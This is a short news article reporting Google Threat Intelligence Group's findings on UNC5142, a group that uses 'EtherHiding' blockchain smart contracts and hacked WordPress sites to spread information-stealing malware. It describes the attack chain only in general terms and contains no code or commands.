- A financially motivated group named UNC5142 is spreading information-stealing Malware via blockchain smart contracts.
- The threat uses hacked WordPress sites and a method called “EtherHiding” that hides malicious code on public blockchains like the BNB Smart Chain.
- Google uncovered around 14,000 web pages affected by UNC5142 as of June 2025, but no activity has been seen since late July 2025.
- The attack uses a multi-stage JavaScript downloader called CLEARSHORT, which fetches malware delivered through blockchain smart contracts and social engineering tactics.
- UNC5142 evolved its smart contract system in late 2024 to a more complex, flexible design that helps avoid detection and enables quick updates.
A financially motivated threat actor identified as UNC5142 has been using blockchain smart contracts to spread malware that steals information from Windows and macOS computers. The group targets compromised WordPress websites and uses a technique called “EtherHiding,” which hides malicious data on public blockchains such as the BNB Smart Chain.
Google Threat Intelligence Group (GTIG) reported that as of June 2025, about 14,000 web pages with injected malicious JavaScript related to UNC5142 were detected, showing widespread targeting of vulnerable WordPress sites. However, no related activity has been observed since July 23, 2025, which may indicate a pause or a change in tactics.
The attack chain relies on a JavaScript downloader named CLEARSHORT, which loads malware in several stages. The first stage injects JavaScript code into website files and interacts with a smart contract on the BNB Smart Chain to retrieve further malicious content. The smart contract then fetches an encrypted landing page used to trick victims into running harmful commands on their systems, leading to malware infections.
On Windows, the attack executes a downloaded HTML Application (HTA) file that runs PowerShell scripts to avoid detection and load the final payload directly into memory. On macOS, attackers use deceptive prompts to get users to run terminal commands that download the Atomic Stealer malware.
CLEARSHORT is linked to ClearFake, a known malicious JavaScript framework. French Cybersecurity firm Sekoia previously analyzed ClearFake, which has operated since mid-2023 and began using the social engineering method ClickFix in May 2024.
The use of blockchain smart contracts helps UNC5142 blend in with normal Web3 activities and makes their operations more resistant to takedown efforts. Since November 2024, the group has moved from a simple contract system to a sophisticated three-contract design based on the proxy pattern, a common software method for upgradable code. This change allows quick updates to key parts like URLs and decryption keys without modifying the malicious JavaScript.
The mutable data stored by smart contracts lets UNC5142 change the malware delivery details by paying small blockchain fees under $2. Google identified two main smart contract infrastructures: the primary system created in November 2024 and a secondary one started in February 2025, used to support increased activity or testing.
GTIG noted, “Given the frequent updates to the infection chain coupled with the consistent operational tempo, high volume of compromised websites, and diversity of distributed malware payloads over the past year and a half, it is likely that UNC5142 has experienced some level of success with their operations.”
For more details, the full report is available at Google Threat Intelligence Group.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- Microsoft Stock Gains 21% YTD as Copilot AI Expands in Windows 11
- Paxos Mints Accidental 300 Trillion PYUSD, Sparks Crypto Panic
- Ethereum MACD Flashes Bearish Signal as ETH Risks Drop Below $4,000
- North Korean Hackers Use EtherHiding for Malware, Crypto Theft
- Ethereum Nears 100x Capacity Boost With Real-Time Proving Tech
